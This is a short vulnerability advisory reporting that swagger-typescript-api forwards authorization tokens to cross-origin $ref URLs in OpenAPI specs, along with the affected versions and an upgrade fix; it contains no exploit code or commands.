AIKIDO-2026-11123
swagger-typescript-api is vulnerable to Exposure of Sensitive Information
74
High Risk
This Affects:
swagger-typescript-apiTL;DR
swagger-typescript-api resolves external $ref URLs in OpenAPI specifications during code generation and forwards the configured authorization token on every request without any same-origin check, host allowlist, or cross-origin scope-down. When a developer supplies credentials to fetch a private spec, a malicious or compromised spec can reference an attacker-controlled URL and cause the generator to send those credentials to it. This exfiltrates high-value secrets such as bearer tokens, personal access tokens, or API keys to the attacker. The fix forwards the authorization token only to same-origin remote URLs and blocks cross-origin credential forwarding.
Who does this affect?
You are affected if you are using a version that falls within the vulnerable range.
Background info
swagger-typescript-api is vulnerable to Exposure of Sensitive Information in versions 0.0.1 - 13.12.1.
How to fix this
Upgrade the swagger-typescript-api library to the patch version.
Are You Affected?
Connect your repositories to instantly see whether vulnerable or malicious packages exist in your codebase.
Free. No credit card required.
SOC 2Compliant
ISO 27001Compliant